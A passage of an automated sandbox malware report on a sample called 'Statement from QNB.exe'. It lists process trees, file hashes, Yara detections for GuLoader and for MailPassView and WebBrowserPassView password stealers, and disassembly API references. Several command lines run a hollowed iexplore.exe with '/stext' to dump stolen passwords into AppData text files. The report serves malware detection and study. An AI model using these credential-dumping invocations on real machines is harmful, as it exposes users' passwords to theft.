                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000000.81130233674.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000000.81127982382.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: iexplore.exe PID: 2448 Parent PID: 1736

                                                                                                  General

                                                                                                  Start time:14:16:30
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss2.txt"
                                                                                                  Imagebase:0x860000
                                                                                                  File size:839632 bytes
                                                                                                  MD5 hash:BBF55D48A97497F61781C226E1CEDE6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000000.81143708925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000011.00000000.81144880094.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: iexplore.exe PID: 1968 Parent PID: 1736

                                                                                                  General

                                                                                                  Start time:14:16:34
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3.txt"
                                                                                                  Imagebase:0x860000
                                                                                                  File size:839632 bytes
                                                                                                  MD5 hash:BBF55D48A97497F61781C226E1CEDE6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: iexplore.exe PID: 5684 Parent PID: 1736

                                                                                                  General

                                                                                                  Start time:14:16:35
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss4.txt"
                                                                                                  Imagebase:0x860000
                                                                                                  File size:839632 bytes
                                                                                                  MD5 hash:BBF55D48A97497F61781C226E1CEDE6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe PID: 8036 Parent PID: 5088

                                                                                                  General

                                                                                                  Start time:14:16:35
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:135168 bytes
                                                                                                  MD5 hash:9C8B626668E14AEB4355EA39D1520E33
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.81386820299.00000000006B0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe PID: 7432 Parent PID: 5088

                                                                                                  General

                                                                                                  Start time:14:16:43
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:135168 bytes
                                                                                                  MD5 hash:9C8B626668E14AEB4355EA39D1520E33
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.81471342102.0000000002CE0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe PID: 6920 Parent PID: 6972

                                                                                                  General

                                                                                                  Start time:14:16:45
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:135168 bytes
                                                                                                  MD5 hash:9C8B626668E14AEB4355EA39D1520E33
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000000.81293484753.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000002.81498277835.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe PID: 4052 Parent PID: 8036

                                                                                                  General

                                                                                                  Start time:14:16:54
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:135168 bytes
                                                                                                  MD5 hash:9C8B626668E14AEB4355EA39D1520E33
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000019.00000002.81577027857.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000019.00000000.81384924963.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe PID: 1316 Parent PID: 7432

                                                                                                  General

                                                                                                  Start time:14:17:02
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:135168 bytes
                                                                                                  MD5 hash:9C8B626668E14AEB4355EA39D1520E33
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000002.81650689390.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000000.81467189265.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                  Chronological Activities

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >

                                                                                                    Analysis Process: Statement from QNB.exe PID: 1112 Parent PID: 7688 Statement from QNB.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 02304D65, Relevance: 8.2, APIs: 1, Strings: 3, Instructions: 1223COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                    • String ID: )Hg$R$q!d
                                                                                                    • API String ID: 3389902171-1250440267
                                                                                                    • Opcode ID: 82fd58cf6e9aba166a2ae27eab7a2e717954f6644a090fb119a56b7d9922f724
                                                                                                    • Instruction ID: c72cecfcece38284ba1c25c36e0d2b6e2a1f18f7b5ca3e5a38108be2fe3aabad
                                                                                                    • Opcode Fuzzy Hash: 82fd58cf6e9aba166a2ae27eab7a2e717954f6644a090fb119a56b7d9922f724
                                                                                                    • Instruction Fuzzy Hash: 0FB21171608389CFDB749F38CC997DABBA2BF56310F45816ECC898B295D3708A41CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022F3E05, Relevance: 7.8, APIs: 2, Strings: 2, Instructions: 827COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • TerminateProcess.KERNELBASE(63541DC6), ref: 022FD0B3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ProcessTerminate
                                                                                                    • String ID: )Hg$q!d
                                                                                                    • API String ID: 560597551-3470481063
                                                                                                    • Opcode ID: 23d5fba9b6d083401923f09a052ef876478e30eebc88e7e80a0e94c3a111cf2d
                                                                                                    • Instruction ID: 0530b985960301e5f306639dd482a98bba47542abcc95d992d086fe6edfea552
                                                                                                    • Opcode Fuzzy Hash: 23d5fba9b6d083401923f09a052ef876478e30eebc88e7e80a0e94c3a111cf2d
                                                                                                    • Instruction Fuzzy Hash: 1C720CB2618389DFCBB49F34CC857EABBA1FF15310F55422ADD899B264C3708A85CB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022FDA66, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 484memorynativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 023020DC: LoadLibraryA.KERNELBASE(FEA7A63B), ref: 02302245
                                                                                                    • NtAllocateVirtualMemory.NTDLL(-000000021172D3F9,?,E3DA1026), ref: 022FDE47
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                    • String ID: )Hg$q!d
                                                                                                    • API String ID: 2616484454-3470481063
                                                                                                    • Opcode ID: 303cdd50e10ab6a21bfc457addbbaff45327540a73ebf046717a75add9e66176
                                                                                                    • Instruction ID: 7482bc9deba785e69037d3785e100debd8af8586e8cf3ac138a80dd12163d721
                                                                                                    • Opcode Fuzzy Hash: 303cdd50e10ab6a21bfc457addbbaff45327540a73ebf046717a75add9e66176
                                                                                                    • Instruction Fuzzy Hash: 5BE1D67129825EDFCB71EE288CC16EAFB94DB1A231F64836ADC259B5D6C332C509C740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02302A7B, Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 714COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: )Hg$q!d
                                                                                                    • API String ID: 0-3470481063
                                                                                                    • Opcode ID: 1adc7d7c661839ff40bc2460def1473c106d42e9b76e29e14458419231c527ea
                                                                                                    • Instruction ID: 42cff60eff5036ccc2cc2c3f89e601b6bd188c8c8498e6dc3619c740189ae3a4
                                                                                                    • Opcode Fuzzy Hash: 1adc7d7c661839ff40bc2460def1473c106d42e9b76e29e14458419231c527ea
                                                                                                    • Instruction Fuzzy Hash: EC62DBB2A08389DFCBB49F74CC957DABBA1FF59310F46412ADD899B254C3705A81CB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0230697A, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 204COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: >Y"?
                                                                                                    • API String ID: 0-1124675244
                                                                                                    • Opcode ID: 395a6911d0ea71d7ec9e72ec80849f1d95dbdcda3624c9290b0bc74b5fcc5937
                                                                                                    • Instruction ID: 261124ba3c12ba59daaac458f8724616ba3ee3f903fc2a162688a983f76fde29
                                                                                                    • Opcode Fuzzy Hash: 395a6911d0ea71d7ec9e72ec80849f1d95dbdcda3624c9290b0bc74b5fcc5937
                                                                                                    • Instruction Fuzzy Hash: 62815872600348CFDB75DE38C9F57EAB7B6AF94350F15822ACC0A9B694C734A640CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02306439, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtProtectVirtualMemory.NTDLL(-E0318E4E,?,?,?,?,02304F95), ref: 02306583
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2706961497-0
                                                                                                    • Opcode ID: 22c6bf4e0eebc66014714935483e2c1206b6b7a0f0d6b7610af828494ff259fb
                                                                                                    • Instruction ID: 6afc717d7a36cf31492b89f5cd0ee8963ad62bc951fbd6fdc5c0c7a1865fd89a
                                                                                                    • Opcode Fuzzy Hash: 22c6bf4e0eebc66014714935483e2c1206b6b7a0f0d6b7610af828494ff259fb
                                                                                                    • Instruction Fuzzy Hash: 541191B47047499FDB28CE198DE4BEBB6A6ABD8300F04823EA95D8B744DB309900C710
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022FD382, Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNELBASE(?), ref: 022FD5F8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 01847e38541d212605e8026ea65f99b00070c1616b8e6ad131507d161d4388b9
                                                                                                    • Instruction ID: c4b9d76d2d8c5347b20fade798f9b92a4ea424577158bffa9550b678cb34fca5
                                                                                                    • Opcode Fuzzy Hash: 01847e38541d212605e8026ea65f99b00070c1616b8e6ad131507d161d4388b9
                                                                                                    • Instruction Fuzzy Hash: 7B11C27111C305DFD7A4AEB8C946AAEBBF1FF14744F42491E9ADA96524C7301681CB07
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022FD72E, Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 4617ae0ea05f7054215e3927791824ad20d3c66cd844baf3d8b3ac2b23730666
                                                                                                    • Instruction ID: afcefa76922d6ce7cea9c64a34b2382780f68f232c219841990609798dd0b6b7
                                                                                                    • Opcode Fuzzy Hash: 4617ae0ea05f7054215e3927791824ad20d3c66cd844baf3d8b3ac2b23730666
                                                                                                    • Instruction Fuzzy Hash: BBE0D83142824987DBB02FAC4901599B661AF09324F988366CA560BAC9C7704055D753
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041C634, Relevance: 202.1, APIs: 105, Strings: 10, Instructions: 878COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041C652
                                                                                                    • __vbaStrCat.MSVBVM60(00403084,00403078,00000002,?,?,?,?,00401216), ref: 0041C6A2
                                                                                                    • __vbaStrMove.MSVBVM60(00403084,00403078,00000002,?,?,?,?,00401216), ref: 0041C6AF
                                                                                                    • __vbaInStr.MSVBVM60(00000000,00403084,00000000,00403084,00403078,00000002,?,?,?,?,00401216), ref: 0041C6BC
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,00403084,00000000,00403084,00403078,00000002,?,?,?,?,00401216), ref: 0041C6D8
                                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000,00403084,00000000,00403084,00403078,00000002,?,?,?,?,00401216), ref: 0041C6F5
                                                                                                    • __vbaOnError.MSVBVM60(000000FF,000000FF,00000000,00403084,00000000,00403084,00403078,00000002,?,?,?,?,00401216), ref: 0041C703
                                                                                                    • __vbaNew2.MSVBVM60(004030A8,0041F5F0,000000FF,000000FF,00000000,00403084,00000000,00403084,00403078,00000002,?,?,?,?,00401216), ref: 0041C722
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403098,0000004C), ref: 0041C787
                                                                                                    • __vbaChkstk.MSVBVM60(00000000,?,00403098,0000004C), ref: 0041C7BB
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030B8,0000002C), ref: 0041C801
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,004030B8,0000002C), ref: 0041C81B
                                                                                                    • #573.MSVBVM60(?,00000002), ref: 0041C849
                                                                                                    • __vbaStrCat.MSVBVM60(004030D4,004030CC,?,00000002), ref: 0041C858
                                                                                                    • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,004030D4,004030CC,?,00000002), ref: 0041C87B
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,00008008,00008008,?,?,?,?,?,004030D4,004030CC,?,00000002), ref: 0041C89E
                                                                                                    • #598.MSVBVM60(?,?,?,00401216), ref: 0041C8BC
                                                                                                    • #611.MSVBVM60(?,?,?,00401216), ref: 0041C8C8
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00401216), ref: 0041C8D2
                                                                                                    • #685.MSVBVM60(?,?,?,00401216), ref: 0041C8DE
                                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,00401216), ref: 0041C8EB
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030D8,00000044), ref: 0041C99C
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,004030D8,00000044), ref: 0041C9B6
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000004,0000000A,0000000A,0000000A,0000000A), ref: 0041C9D9
                                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041C9FD
                                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041CA0A
                                                                                                    • __vbaStrToAnsi.MSVBVM60(?,ANDREWARTHA,00297142,0006317B,?,00000000), ref: 0041CA27
                                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,ANDREWARTHA,00297142,0006317B,?,00000000), ref: 0041CA3F
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000,?,ANDREWARTHA,00297142,0006317B,?,00000000), ref: 0041CA73
                                                                                                    • __vbaStrCat.MSVBVM60(4:4,0040312C,?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041CA9B
                                                                                                    • __vbaStrMove.MSVBVM60(4:4,0040312C,?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041CAA8
                                                                                                    • #541.MSVBVM60(?,00000000,4:4,0040312C,?,?,?,?,?,?,?,?,00000000), ref: 0041CAB5
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000000,4:4,0040312C,?,?,?,?,?,?,?,?,00000000), ref: 0041CAC1
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,4:4,0040312C,?,?,?,?,?,?,?,?,00000000), ref: 0041CACE
                                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,4:4,0040312C,?,?,?,?,?,?,?,?,00000000), ref: 0041CAD9
                                                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000000,4:4,0040312C,?,?,?,?,?,?,?,?,00000000), ref: 0041CAE4
                                                                                                    • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041CB13
                                                                                                    • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041CB1D
                                                                                                    • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041CB28
                                                                                                    • __vbaNew2.MSVBVM60(004030A8,0041F5F0,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041CB4E
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403098,0000001C), ref: 0041CBB3
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403140,00000064), ref: 0041CC11
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403140,00000064), ref: 0041CC36
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041CC4D
                                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,00401216), ref: 0041CC5A
                                                                                                    • __vbaSetSystemError.MSVBVM60(004F0673,0059AE9B,002EA394,0083BCF2,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CC85
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041CCB2
                                                                                                    • __vbaNew2.MSVBVM60(004030A8,0041F5F0,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CCE3
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403098,00000014), ref: 0041CD48
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000060), ref: 0041CDA4
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00403168,00000060), ref: 0041CDD4
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403168,00000060), ref: 0041CDDF
                                                                                                    • __vbaNew2.MSVBVM60(004030A8,0041F5F0), ref: 0041CDFE
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403098,00000014), ref: 0041CE63
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000140), ref: 0041CEC5
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403168,00000140), ref: 0041CEEA
                                                                                                    • __vbaEnd.MSVBVM60(00000000,?,00403168,00000140), ref: 0041CEF6
                                                                                                    • __vbaStrToAnsi.MSVBVM60(?,Contangoes3,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CF0E
                                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,Contangoes3,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0041CF1F
                                                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000000,Contangoes3), ref: 0041CF42
                                                                                                    • __vbaNew2.MSVBVM60(004030A8,0041F5F0), ref: 0041CF70
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403098,00000014), ref: 0041CFD5
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000130), ref: 0041D037
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00403168,00000130), ref: 0041D067
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00403168,00000130), ref: 0041D072
                                                                                                    • #536.MSVBVM60(00000002), ref: 0041D099
                                                                                                    • __vbaStrMove.MSVBVM60(00000002), ref: 0041D0A3
                                                                                                    • __vbaFreeVar.MSVBVM60(00000002), ref: 0041D0AE
                                                                                                    • __vbaNew2.MSVBVM60(004030A8,0041F5F0,00000002), ref: 0041D0D4
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403098,0000004C), ref: 0041D139
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030B8,00000024), ref: 0041D19F
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,004030B8,00000024), ref: 0041D1CF
                                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,004030B8,00000024), ref: 0041D1DA
                                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00402E6C,?,?), ref: 0041D1F9
                                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00402E6C,?,?), ref: 0041D20A
                                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00402E6C,?,?,00000000,00402E6C,?,?), ref: 0041D222
                                                                                                    • __vbaRecDestructAnsi.MSVBVM60(00402E6C,?,00402E6C,?,?,00000000,00402E6C,?,?), ref: 0041D24B
                                                                                                    • #613.MSVBVM60(?,00000002,00402E6C,?,00402E6C,?,?,00000000,00402E6C,?,?), ref: 0041D288
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000002,00402E6C,?,00402E6C,?,?,00000000,00402E6C,?,?), ref: 0041D294
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000002,00402E6C,?,00402E6C,?,?,00000000,00402E6C,?,?), ref: 0041D29E
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002,00402E6C,?,00402E6C,?,?,00000000,00402E6C,?,?), ref: 0041D2B3
                                                                                                    • __vbaNew2.MSVBVM60(004030A8,0041F5F0,00000000,?,Contangoes3,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0041D2D5
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403098,00000014), ref: 0041D33A
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000078), ref: 0041D396
